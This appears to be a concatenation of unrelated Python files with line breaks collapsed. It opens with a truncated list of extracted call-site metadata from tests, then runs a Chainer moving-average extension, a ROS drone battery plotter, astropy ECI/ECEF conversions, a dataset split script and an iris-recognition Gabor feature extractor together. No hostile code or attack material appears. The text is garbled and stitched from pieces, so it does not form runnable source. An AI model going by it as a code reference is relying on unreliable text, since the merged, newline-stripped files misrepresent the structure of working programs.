size=5)\n', (7951, 7962), True, 'import numpy as np\n'), ((8092, 8121), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (8112, 8121), False, 'from conftest import generate_action_dist\n'), ((8132, 8165), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (8143, 8165), False, 'import torch\n'), ((8262, 8289), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (8278, 8289), True, 'import numpy as np\n'), ((8419, 8448), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (8439, 8448), False, 'from conftest import generate_action_dist\n'), ((8555, 8582), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (8571, 8582), True, 'import numpy as np\n'), ((8688, 8717), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (8708, 8717), False, 'from conftest import generate_action_dist\n'), ((8859, 8886), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (8875, 8886), True, 'import numpy as np\n'), ((8999, 9028), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (9019, 9028), False, 'from conftest import generate_action_dist\n'), ((9039, 9072), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (9050, 9072), False, 'import torch\n'), ((9169, 9196), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (9185, 9196), True, 'import numpy as np\n'), ((9353, 9382), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (9373, 9382), False, 'from conftest import generate_action_dist\n'), ((9489, 9516), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (9505, 9516), True, 'import numpy as np\n'), ((9622, 9651), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (9642, 9651), False, 'from conftest import generate_action_dist\n'), ((9793, 9820), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (9809, 9820), True, 'import numpy as np\n'), ((9933, 9962), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (9953, 9962), False, 'from conftest import generate_action_dist\n'), ((10099, 10126), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (10115, 10126), True, 'import numpy as np\n'), ((10251, 10280), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (10271, 10280), False, 'from conftest import generate_action_dist\n'), ((10407, 10434), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (10423, 10434), True, 'import numpy as np\n'), ((10540, 10569), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (10560, 10569), False, 'from conftest import generate_action_dist\n'), ((10711, 10738), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (10727, 10738), True, 'import numpy as np\n'), ((10851, 10880), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (10871, 10880), False, 'from conftest import generate_action_dist\n'), ((11017, 11044), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (11033, 11044), True, 'import numpy as np\n'), ((11178, 11207), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (11198, 11207), False, 'from conftest import generate_action_dist\n'), ((11321, 11333), 'numpy.arange', 'np.arange', (['(5)'], {}), '(5)\n', (11330, 11333), True, 'import numpy as np\n'), ((11361, 11388), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (11377, 11388), True, 'import numpy as np\n'), ((11496, 11525), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (11516, 11525), False, 'from conftest import generate_action_dist\n'), ((11662, 11689), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (11678, 11689), True, 'import numpy as np\n'), ((11848, 11877), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (11868, 11877), False, 'from conftest import generate_action_dist\n'), ((12014, 12041), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (12030, 12041), True, 'import numpy as np\n'), ((12664, 12714), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': 'f"""{description}*"""'}), "(ValueError, match=f'{description}*')\n", (12677, 12714), False, 'import pytest\n'), ((16086, 16115), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (16106, 16115), False, 'from conftest import generate_action_dist\n'), ((16143, 16170), 'numpy.random.choice', 'np.random.choice', (['(4)'], {'size': '(5)'}), '(4, size=5)\n', (16159, 16170), True, 'import numpy as np\n'), ((16241, 16285), 'numpy.random.uniform', 'np.random.uniform', ([], {'low': '(0.5)', 'high': '(1.0)', 'size': '(5)'}), '(low=0.5, high=1.0, size=5)\n', (16258, 16285), True, 'import numpy as np\n'), ((16313, 16340), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (16329, 16340), True, 'import numpy as np\n'), ((18944, 18963), 'torch.from_numpy', 'torch.from_numpy', (['v'], {}), '(v)\n', (18960, 18963), False, 'import torch\n'), ((22095, 22114), 'torch.from_numpy', 'torch.from_numpy', (['v'], {}), '(v)\n', (22111, 22114), False, 'import torch\n'), ((24131, 24150), 'torch.from_numpy', 'torch.from_numpy', (['v'], {}), '(v)\n', (24147, 24150), False, 'import torch\n'), ((18612, 18766), 're.escape', 're.escape', (['"""estimate_policy_value() missing 4 required positional arguments: \'reward\', \'action\', \'pscore\', and \'estimated_rewards_by_reg_model\'"""'], {}), '(\n "estimate_policy_value() missing 4 required positional arguments: \'reward\', \'action\', \'pscore\', and \'estimated_rewards_by_reg_model\'"\n )\n', (18621, 18766), False, 'import re\n'), ((19478, 19565), 're.escape', 're.escape', (['"""This is not implemented for Swtich-DR because it is indifferentiable."""'], {}), "(\n 'This is not implemented for Swtich-DR because it is indifferentiable.')\n", (19487, 19565), False, 'import re\n'), ((20348, 20435), 're.escape', 're.escape', (['"""This is not implemented for Swtich-DR because it is indifferentiable."""'], {}), "(\n 'This is not implemented for Swtich-DR because it is indifferentiable.')\n", (20357, 20435), False, 'import re\n'), ((20660, 20821), 're.escape', 're.escape', (['"""estimate_policy_value_tensor() missing 4 required positional arguments: \'reward\', \'action\', \'pscore\', and \'estimated_rewards_by_reg_model\'"""'], {}), '(\n "estimate_policy_value_tensor() missing 4 required positional arguments: \'reward\', \'action\', \'pscore\', and \'estimated_rewards_by_reg_model\'"\n )\n', (20669, 20821), False, 'import re\n')]
import numpy as np from chainer import cuda, Link, Chain, ChainList from chainer.training import extension def _namedpersistents_as_link(target): assert isinstance(target, Link) d = target.__dict__ for name in target._persistent: yield '/' + name, d[name] def _namedpersistents_as_chain(target): assert isinstance(target, Chain) for name, persistent in _namedpersistents_as_link(target): yield name, persistent d = target.__dict__ for name in target._children: prefix = '/' + name for path, persistent in namedpersistents(d[name]): yield prefix + path, persistent def _namedpersistents_as_chain_list(target): assert isinstance(target, ChainList) for name, persistent in _namedpersistents_as_link(target): yield name, persistent for idx, link in enumerate(target._children): prefix = '/%d' % idx for path, persistent in namedpersistents(link): yield prefix + path, persistent def namedpersistents(target): if isinstance(target, Chain): retriever = _namedpersistents_as_chain elif isinstance(target, ChainList): retriever = _namedpersistents_as_chain_list elif isinstance(target, Link): # do not put this above, because Chain/ChainList are Link retriever = _namedpersistents_as_link else: raise ValueError for name, persistent in retriever(target): yield name, persistent class ExponentialMovingAverage(extension.Extension): name = 'ExponentialMovingAverage' timing = 'post' def __init__(self, target, rate, device=None): self.shadow_target = target.copy() self._shadow_data = dict() self._rate = rate self._device = device self._initialized = False self._param_names = set() for name, _ in target.namedparams(): self._param_names.add(name) def __call__(self, optimizer): if not self._initialized: self._initialize() target_persistents = {} for name, param in namedpersistents(optimizer.target): target_persistents[name] = param # copy all persistents to shadow_target # without this, all of persistents in shadow_target will be initialized in multiprocessing environments for name, persistent in namedpersistents(self.shadow_target): # persistent's type is numpy/cupy array or scalar (int/float) if isinstance(persistent, cuda.ndarray): persistent.data.copy_from(target_persistents[name].data, persistent.size * persistent.dtype.itemsize) else: persistent = target_persistents[name] for name, param in optimizer.target.namedparams(): self._update_shadow(name, param) for name, param in self.shadow_target.namedparams(): param.data = self._shadow_data[name] @property def trigger(self): return None def _initialize(self): # necessary for cases when using multiprocess parallel updater self.shadow_target.to_gpu(self._device) self._initialized = True def _update_shadow(self, name, param): s, p = self._shadow_data.get(name), param.data if p is None: return if s is None: self._shadow_data[name] = cuda.get_array_module(p).array(p) return with cuda.get_device_from_array(p) as dev: if int(dev) == -1: s -= (1 - self._rate) * (s - p) else: kernel = cuda.elementwise('T p, T decay', 'T s', 's -= (1 - decay) * (s - p)', 'exponential_moving_average') kernel(p, self._rate, s) def serialize(self, serializer): for name in self._param_names: shadow_data = self._shadow_data.get(name) data = serializer['shadow_params'](name, shadow_data) if shadow_data is None and data is not None: if self._device == -1: self._shadow_data[name] = np.array(data) else: self._shadow_data[name] = cuda.to_gpu(data, device=self._device)
[ "chainer.cuda.get_device_from_array", "chainer.cuda.get_array_module", "chainer.cuda.elementwise", "numpy.array", "chainer.cuda.to_gpu" ]
[((3435, 3464), 'chainer.cuda.get_device_from_array', 'cuda.get_device_from_array', (['p'], {}), '(p)\n', (3461, 3464), False, 'from chainer import cuda, Link, Chain, ChainList\n'), ((3596, 3699), 'chainer.cuda.elementwise', 'cuda.elementwise', (['"""T p, T decay"""', '"""T s"""', '"""s -= (1 - decay) * (s - p)"""', '"""exponential_moving_average"""'], {}), "('T p, T decay', 'T s', 's -= (1 - decay) * (s - p)',\n 'exponential_moving_average')\n", (3612, 3699), False, 'from chainer import cuda, Link, Chain, ChainList\n'), ((3368, 3392), 'chainer.cuda.get_array_module', 'cuda.get_array_module', (['p'], {}), '(p)\n', (3389, 3392), False, 'from chainer import cuda, Link, Chain, ChainList\n'), ((4203, 4217), 'numpy.array', 'np.array', (['data'], {}), '(data)\n', (4211, 4217), True, 'import numpy as np\n'), ((4286, 4324), 'chainer.cuda.to_gpu', 'cuda.to_gpu', (['data'], {'device': 'self._device'}), '(data, device=self._device)\n', (4297, 4324), False, 'from chainer import cuda, Link, Chain, ChainList\n')]
#!/usr/bin/env python import rospy import os import matplotlib.pyplot as plt import pickle from tello_driver.msg import TelloStatus import numpy as np import atexit import datetime RECORD_BATTERY = False class BatteryLogPlot(object): def __init__(self): # current variables self.zero_time = rospy.Time.now() print(self.zero_time) self.time_axis = [] self.battery_level = [] # Subscribe to Sensor and Odom topic self.sub_tello_status = rospy.Subscriber('/tello/status', TelloStatus, self.cb_status) rospy.loginfo('Battery Plot ready') # at exit save plot atexit.register(self.save_plot) def cb_status(self, msg): now = rospy.Time.now() self.time_axis.append(now.secs-self.zero_time.secs) self.battery_level.append(msg.battery_percentage) print('time passed: ', now.secs-self.zero_time.secs, ' battery: ', msg.battery_percentage) def save_plot(self): print('dumping variables') path = '%s/Documents/%s' % (os.getenv('HOME'), datetime.datetime.now().strftime('battery-hover-tello-sensor-no-ds%Y-%m-%d_%H%M%S')) # save save variables as pickle pickle.dump([self.time_axis, self.battery_level], file(path + '.pickle', 'w')) print('Variables saved') def plot_battery(): # load pickles # path_tello_sensor_esp_off = '/home/tello18/Documents/battery-hover-2020-08-17_235612.pickle' # path_tello_sensor_esp_on_ds_on = '/home/tello18/Documents/battery-hover-2020-08-17_235612.pickle' # path_tello_sensor_esp_on_ds_off = '/home/tello18/Documents/battery-hover-no-ds2020-09-06_222136' tello_only_1 = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-tello-only2020-08-18.pickle' tello_only_2 = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-tello-only2020-09-08_144210.pickle' tello_sensor_1 = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-tello-sensor-2020-08-18_165044.pickle' tello_sensor_2 = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-sensor-off2020-09-07_180356.pickle' tello_sensor_no_probs = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-tello-sensor-off-no-props2020-09-08_175258.pickle' tello_sensor_ds_1 = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-sensor-ds-1-2020-08-20_185543.pickle' tello_sensor_ds_2 = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-sensor-ds-2-2020-08-21_155335.pickle' tello_sensor_no_ds_1 = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-no-ds2020-09-06_222136.pickle' tello_sensor_no_ds_2 = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-tello-sensor-no-ds2020-09-10_183630.pickle' time_tello, battery_level_tello = pickle.load(file(tello_only_1)) time_tello_2, battery_level_tello_2 = pickle.load(file(tello_only_2)) time_tello_sensor_no_probs, battery_level_tello_sensor_no_probs = pickle.load(file(tello_sensor_no_probs)) time_tello_sensor, battery_level_tello_sensor = pickle.load(file(tello_sensor_1)) time_tello_sensor_2, battery_level_tello_sensor_2 = pickle.load(file(tello_sensor_2)) time_tello_sensor_ds, battery_level_tello_ds_sensor = pickle.load(file(tello_sensor_ds_1)) time_tello_sensor_ds_2, battery_level_tello_ds_sensor_2 = pickle.load(file(tello_sensor_ds_2)) time_tello_sensor_no_ds, battery_level_tello_sensor_no_ds = pickle.load(file(tello_sensor_no_ds_1)) time_tello_sensor_no_ds_2, battery_level_tello_sensor_no_ds_2 = pickle.load(file(tello_sensor_no_ds_2)) # time in min time_tello_min = [x / 60.0 for x in time_tello] time_tello_min_2 = [x / 60.0 for x in time_tello_2] time_tello_sensor_no_probs_min = [x / 60.0 for x in time_tello_sensor_no_probs] time_tello_sensor_min = [x / 60.0 for x in time_tello_sensor] time_tello_sensor_min_2 = [x / 60.0 for x in time_tello_sensor_2] time_tello_sensor_ds_min = [x / 60.0 for x in time_tello_sensor_ds] time_tello_sensor_ds_min_2 = [x / 60.0 for x in time_tello_sensor_ds_2] time_tello_sensor_no_ds_min = [x / 60.0 for x in time_tello_sensor_no_ds] time_tello_sensor_no_ds_min_2 = [x / 60.0 for x in time_tello_sensor_no_ds_2] # plot fig_battery = plt.figure() ax_battery = fig_battery.add_subplot(111) # ax_battery.scatter(time_tello_min, battery_level_tello, marker='.', c='b', linewidths=0.01, alpha=0.1) # , 'o', color='b', label='Tello only') # Fit with polyfit # p = np.poly1d(np.polyfit(time_tello_min, battery_level_tello, 3)) # ax_battery.plot(time_tello_min, p(time_tello_min), color='b', linewidth=2.0, label='Tello only') ax_battery.plot(time_tello_min, battery_level_tello, color='g', linewidth=1.0, label='Tello only: %.1f min' % time_tello_min[-1]) ax_battery.plot(time_tello_min_2, battery_level_tello_2, color='g', linewidth=1.0, label='Tello only: %.1f min' % time_tello_min_2[-1]) ax_battery.plot(time_tello_sensor_no_probs_min, battery_level_tello_sensor_no_probs, color='c', linewidth=1.0, label='Tello no guards with sensor off: %.1f min' % time_tello_sensor_no_probs_min[-1]) ax_battery.plot(time_tello_sensor_min, battery_level_tello_sensor, color='b', linewidth=1.0, label='Tello with sensor off: %.1f min' % time_tello_sensor_min[-1]) ax_battery.plot(time_tello_sensor_min_2, battery_level_tello_sensor_2, color='b', linewidth=1.0, label='Tello with sensor off: %.1f min' % time_tello_sensor_min_2[-1]) ax_battery.plot(time_tello_sensor_ds_min, battery_level_tello_ds_sensor, color='y', linewidth=1.0, label='Tello with sensor and ds: %.1f min' % time_tello_sensor_ds_min[-1]) ax_battery.plot(time_tello_sensor_ds_min_2, battery_level_tello_ds_sensor_2, color='y', linewidth=1.0, label='Tello with sensor and ds: %.1f min' % time_tello_sensor_ds_min_2[-1]) ax_battery.plot(time_tello_sensor_no_ds_min, battery_level_tello_sensor_no_ds, color='k', linewidth=1.0, label='Tello with sensor and no ds: %.1f min' % time_tello_sensor_no_ds_min[-1]) ax_battery.plot(time_tello_sensor_no_ds_min_2, battery_level_tello_sensor_no_ds_2, color='k', linewidth=1.0, label='Tello with sensor and no ds: %.1f min' % time_tello_sensor_no_ds_min_2[-1]) ax_battery.set_xlabel('time in [min]') ax_battery.set_ylabel('battery level in [%]') ax_battery.set_title('Flight Time') ax_battery.legend() plt.xticks(np.arange(0, 12.1, step=1.0)) plt.yticks(np.arange(0, 100.1, step=10.0)) plt.grid(linewidth=.5) plt.show() def main(): rospy.init_node('battery_plot_node') if RECORD_BATTERY: sensor = BatteryLogPlot() rospy.spin() # keep process alive else: plot_battery() if __name__ == '__main__': main()
[ "atexit.register", "matplotlib.pyplot.show", "rospy.Time.now", "rospy.Subscriber", "datetime.datetime.now", "rospy.loginfo", "matplotlib.pyplot.figure", "numpy.arange", "rospy.init_node", "rospy.spin", "matplotlib.pyplot.grid", "os.getenv" ]
[((4337, 4349), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (4347, 4349), True, 'import matplotlib.pyplot as plt\n'), ((6745, 6768), 'matplotlib.pyplot.grid', 'plt.grid', ([], {'linewidth': '(0.5)'}), '(linewidth=0.5)\n', (6753, 6768), True, 'import matplotlib.pyplot as plt\n'), ((6772, 6782), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (6780, 6782), True, 'import matplotlib.pyplot as plt\n'), ((6801, 6837), 'rospy.init_node', 'rospy.init_node', (['"""battery_plot_node"""'], {}), "('battery_plot_node')\n", (6816, 6837), False, 'import rospy\n'), ((315, 331), 'rospy.Time.now', 'rospy.Time.now', ([], {}), '()\n', (329, 331), False, 'import rospy\n'), ((500, 562), 'rospy.Subscriber', 'rospy.Subscriber', (['"""/tello/status"""', 'TelloStatus', 'self.cb_status'], {}), "('/tello/status', TelloStatus, self.cb_status)\n", (516, 562), False, 'import rospy\n'), ((571, 606), 'rospy.loginfo', 'rospy.loginfo', (['"""Battery Plot ready"""'], {}), "('Battery Plot ready')\n", (584, 606), False, 'import rospy\n'), ((644, 675), 'atexit.register', 'atexit.register', (['self.save_plot'], {}), '(self.save_plot)\n', (659, 675), False, 'import atexit\n'), ((721, 737), 'rospy.Time.now', 'rospy.Time.now', ([], {}), '()\n', (735, 737), False, 'import rospy\n'), ((6664, 6692), 'numpy.arange', 'np.arange', (['(0)', '(12.1)'], {'step': '(1.0)'}), '(0, 12.1, step=1.0)\n', (6673, 6692), True, 'import numpy as np\n'), ((6709, 6739), 'numpy.arange', 'np.arange', (['(0)', '(100.1)'], {'step': '(10.0)'}), '(0, 100.1, step=10.0)\n', (6718, 6739), True, 'import numpy as np\n'), ((6908, 6920), 'rospy.spin', 'rospy.spin', ([], {}), '()\n', (6918, 6920), False, 'import rospy\n'), ((1054, 1071), 'os.getenv', 'os.getenv', (['"""HOME"""'], {}), "('HOME')\n", (1063, 1071), False, 'import os\n'), ((1108, 1131), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1129, 1131), False, 'import datetime\n')]
#!/usr/bin/env python # coding: utf-8 import numpy as np import math test_scores=[88,92,79,93,85] print(np.mean(test_scores)) curved_5=[score + 5 for score in test_scores] print(np.mean(curved_5)) curved_10=[score + 10 for score in test_scores] print(np.mean(curved_10)) curved_sqrt=[math.sqrt(score)*10 for score in test_scores] print(np.mean(curved_sqrt)) # # Used list comprehensions to make it more concise and readable,more descriptive names for resulting lists and variables,used numpy for mean calculation # # Still curved_5 and curved_10 have same code logic ,we can generalise it into function. Code can be refactored.
[ "numpy.mean", "math.sqrt" ]
[((110, 130), 'numpy.mean', 'np.mean', (['test_scores'], {}), '(test_scores)\n', (117, 130), True, 'import numpy as np\n'), ((188, 205), 'numpy.mean', 'np.mean', (['curved_5'], {}), '(curved_5)\n', (195, 205), True, 'import numpy as np\n'), ((265, 283), 'numpy.mean', 'np.mean', (['curved_10'], {}), '(curved_10)\n', (272, 283), True, 'import numpy as np\n'), ((354, 374), 'numpy.mean', 'np.mean', (['curved_sqrt'], {}), '(curved_sqrt)\n', (361, 374), True, 'import numpy as np\n'), ((301, 317), 'math.sqrt', 'math.sqrt', (['score'], {}), '(score)\n', (310, 317), False, 'import math\n')]
#eci_ecef_conversions.py #<NAME> (nhz2) #November 24, 2019 # using examples from https://astropy.readthedocs.io/en/latest/coordinates/velocities.html """Module for using astropy to convert between ECI and ECEF coordinates and velocities""" import astropy.units as u from astropy.coordinates import (ITRS,GCRS) from astropy.coordinates import (CartesianRepresentation,CartesianDifferential) from astropy.time import Time import numpy as np def time2astropyTime(time,init_gps_weeknum): """ args: time(double): time since init_GPS_week_number in seconds init_gps_weeknum(int): initial GPS week number.""" return Time(init_gps_weeknum*7*24*60*60, time, scale='tai', format='gps') def ecef2eci_mc_runs(times, mc_runs, init_gps_weeknum): ''' Times and mc_runs have the same length. args: mc_runs, a list of all mc_runs, each of which is a list of positions across the duration of the run times, a list of times, measured in seconds since the pan_epoch init_gps_weeknum, the GPS week number of the pan epoch returns: a list of all the mc_runs, each of which is a list of positions in ECI ''' num_times = len(times) list_of_mc_snapshots = np.array(mc_runs).transpose((1,0,2)) list_of_mc_snapshots_eci = np.array([ecef2eci_same_time_batch(times[idx], list_of_mc_snapshots[idx], init_gps_weeknum) for idx in range(num_times)]) return list_of_mc_snapshots_eci def get_covariances(mc_snapshots_eci): '''Return a list of the covariances of the position vectors in ECI args: a list over mc runs, then over time of the position vectors returns: a list of 3 x 3 matricies over time''' return np.array([np.cov(x.T) for x in mc_snapshots_eci]) def ecef2eci_same_time_batch(time, vectors, init_gps_weeknum): '''Converts a batch of position vectors at the same time into the ECI coordinate frame args: vectors: a list of 3-element numpy arrays, each representing a position vector in ECEF time: a single time in seconds since the pan epoch init_gps_weeknum: the pan epoch returns: a list of 3-element numpy arrays representing the position in ECI coordinates, as a 2d numpy matrix ''' vectors_transposed = np.array(vectors).T return ecef2eci(time, vectors_transposed, vectors_transposed, init_gps_weeknum)[0].T def ecef2eci(time,r_ecef,v_ecef,init_gps_weeknum): """Returns a tuple of position and velocity in ECI""" coord_ecef=ITRS(x=r_ecef[0]*u.m, y=r_ecef[1]*u.m, z=r_ecef[2]*u.m, v_x=v_ecef[0]*u.m/u.s, v_y=v_ecef[1]*u.m/u.s, v_z=v_ecef[2]*u.m/u.s, representation_type=CartesianRepresentation, differential_type=CartesianDifferential, obstime=time2astropyTime(time,init_gps_weeknum)) coord_eci= coord_ecef.transform_to(GCRS(obstime=time2astropyTime(time,init_gps_weeknum))) return (coord_eci.cartesian.xyz.to_value(u.m),coord_eci.velocity.d_xyz.to_value(u.m/u.s)) def eci2ecef(time,r_eci,v_eci,init_gps_weeknum): """Returns a tuple of position and velocity in ECEF""" coord_eci=GCRS(x=r_eci[0]*u.m, y=r_eci[1]*u.m, z=r_eci[2]*u.m, v_x=v_eci[0]*u.m/u.s, v_y=v_eci[1]*u.m/u.s, v_z=v_eci[2]*u.m/u.s, representation_type=CartesianRepresentation, differential_type=CartesianDifferential, obstime=time2astropyTime(time,init_gps_weeknum)) coord_ecef= coord_eci.transform_to(ITRS(obstime=time2astropyTime(time,init_gps_weeknum))) return (coord_ecef.cartesian.xyz.to_value(u.m),coord_ecef.velocity.d_xyz.to_value(u.m/u.s)) if __name__ == '__main__': xs = [[0,0,3],[1,0,0],[0,1,0],[0,0,1],[1,1,1]] xss = [ [[1,2,3],[4,5,6], [4,5,6]], [[4,2,3],[4,5,6],[5,15,16]], [[1,2,3],[4,5,6], [40,15,60]] ] def copy_xs(): return [[y for y in x] for x in xs] mc_runs = [xss[0], xss[1], xss[2]] times = [1,2,3] converted_mc_runs = ecef2eci_mc_runs(times, mc_runs, 2045) covariances = get_covariances(converted_mc_runs) # print(converted_mc_runs.shape) # print(converted_mc_runs) print(covariances.shape) print(covariances) # print(covariances)
[ "astropy.time.Time", "numpy.cov", "numpy.array" ]
[((638, 712), 'astropy.time.Time', 'Time', (['(init_gps_weeknum * 7 * 24 * 60 * 60)', 'time'], {'scale': '"""tai"""', 'format': '"""gps"""'}), "(init_gps_weeknum * 7 * 24 * 60 * 60, time, scale='tai', format='gps')\n", (642, 712), False, 'from astropy.time import Time\n'), ((2277, 2294), 'numpy.array', 'np.array', (['vectors'], {}), '(vectors)\n', (2285, 2294), True, 'import numpy as np\n'), ((1222, 1239), 'numpy.array', 'np.array', (['mc_runs'], {}), '(mc_runs)\n', (1230, 1239), True, 'import numpy as np\n'), ((1719, 1730), 'numpy.cov', 'np.cov', (['x.T'], {}), '(x.T)\n', (1725, 1730), True, 'import numpy as np\n')]
# !/usr/bin/env python # -*- coding: utf-8 -*- """ @Author: <NAME> @Date: 2018-08-10 19:31:47 """ from __future__ import absolute_import, division, print_function import csv import os import numpy as np np.random.seed(0) ratio = 0.9 def gen_lines(path, d): path = os.path.join(path, d) lines = [] for f in os.listdir(path): if f.endswith('.jpg'): lines.append([os.path.join(path, f), d]) return lines path = 'data' dirs = sorted(os.listdir(path)) all_lines = [] for d in dirs: all_lines.append(gen_lines(path, d)) class_count = {} len_sum = 0 for lines in all_lines: print('{} -> {}'.format(lines[0][1], len(lines))) class_count[lines[0][1]] = len(lines) len_sum += len(lines) len_avg = int(len_sum/len(all_lines)) cc = sorted(class_count, key=class_count.get, reverse=True) with open('class_count.txt', 'w') as f: for c in cc: f.write('{} {}\n'.format(c, class_count[c])) train_lines = [] valid_lines = [] for lines in all_lines: np.random.shuffle(lines) cut = int(len(lines)*ratio) train_lines += lines[:cut] valid_lines += lines[cut:] np.random.shuffle(train_lines) np.random.shuffle(valid_lines) with open('train.csv', 'wb') as f: cw = csv.writer(f) for line in train_lines: cw.writerow(line) with open('valid.csv', 'wb') as f: cw = csv.writer(f) for line in valid_lines: cw.writerow(line)
[ "numpy.random.seed", "csv.writer", "os.path.join", "os.listdir", "numpy.random.shuffle" ]
[((212, 229), 'numpy.random.seed', 'np.random.seed', (['(0)'], {}), '(0)\n', (226, 229), True, 'import numpy as np\n'), ((1097, 1127), 'numpy.random.shuffle', 'np.random.shuffle', (['train_lines'], {}), '(train_lines)\n', (1114, 1127), True, 'import numpy as np\n'), ((1128, 1158), 'numpy.random.shuffle', 'np.random.shuffle', (['valid_lines'], {}), '(valid_lines)\n', (1145, 1158), True, 'import numpy as np\n'), ((277, 298), 'os.path.join', 'os.path.join', (['path', 'd'], {}), '(path, d)\n', (289, 298), False, 'import os\n'), ((323, 339), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (333, 339), False, 'import os\n'), ((460, 476), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (470, 476), False, 'import os\n'), ((983, 1007), 'numpy.random.shuffle', 'np.random.shuffle', (['lines'], {}), '(lines)\n', (1000, 1007), True, 'import numpy as np\n'), ((1202, 1215), 'csv.writer', 'csv.writer', (['f'], {}), '(f)\n', (1212, 1215), False, 'import csv\n'), ((1308, 1321), 'csv.writer', 'csv.writer', (['f'], {}), '(f)\n', (1318, 1321), False, 'import csv\n'), ((388, 409), 'os.path.join', 'os.path.join', (['path', 'f'], {}), '(path, f)\n', (400, 409), False, 'import os\n')]
import cv2 import numpy as np import glob import math import scipy from scipy.spatial import distance from scipy import signal from sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA import matplotlib.pyplot as plt import pandas as pd from sklearn import metrics #modulating function as defined in paper def m(x ,y, f): val = np.cos(2*np.pi*f*math.sqrt(x **2 + y**2)) return val #spatial filter as defined in paper def gabor(x, y, dx, dy, f): gb = (1/(2*math.pi*dx*dy))*np.exp(-0.5*(x**2 / dx**2 + y**2 / dy**2)) * m(x, y, f) return gb #function to calculate spatial filter over 8x8 blocks def spatial(f,dx,dy): sfilter=np.zeros((8,8)) for i in range(8): for j in range(8): sfilter[i,j]=gabor((-4+j),(-4+i),dx,dy,f) return sfilter def get_vec(convolvedtrain1,convolvedtrain2): feature_vec=[] for i in range(6): for j in range(64): #Run 8 by 8 filtered block iteratively over the entire image start_height = i*8 end_height = start_height+8 start_wid = j*8 end_wid = start_wid+8 grid1 = convolvedtrain1[start_height:end_height, start_wid:end_wid] grid2 = convolvedtrain2[start_height:end_height, start_wid:end_wid] # Channel 1 absolute = np.absolute(grid1) # mean mean = np.mean(absolute) feature_vec.append(mean) #deviation std = np.mean(np.absolute(absolute-mean)) feature_vec.append(std) # Channel 2 absolute = np.absolute(grid2) # mean mean = np.mean(absolute) feature_vec.append(mean) #deviation std = np.mean(np.absolute(absolute-mean)) feature_vec.append(std) return feature_vec def FeatureExtraction(enhanced): con1=[] con2=[] #get spatial filters filter1=spatial(0.67,3,1.5) filter2=spatial(0.67,4,1.5) feature_vector=[] for i in range(len(enhanced)): img=enhanced[i] #define a 48x512 region over which the filters are applied img_roi=img[:48,:] filtered1=scipy.signal.convolve2d(img_roi,filter1,mode='same') filtered2=scipy.signal.convolve2d(img_roi,filter2,mode='same') con1.append(filtered1) con2.append(filtered2) fv=get_vec(filtered1,filtered2) feature_vector.append(fv) return feature_vector #each feature vector has a dimension of 1536
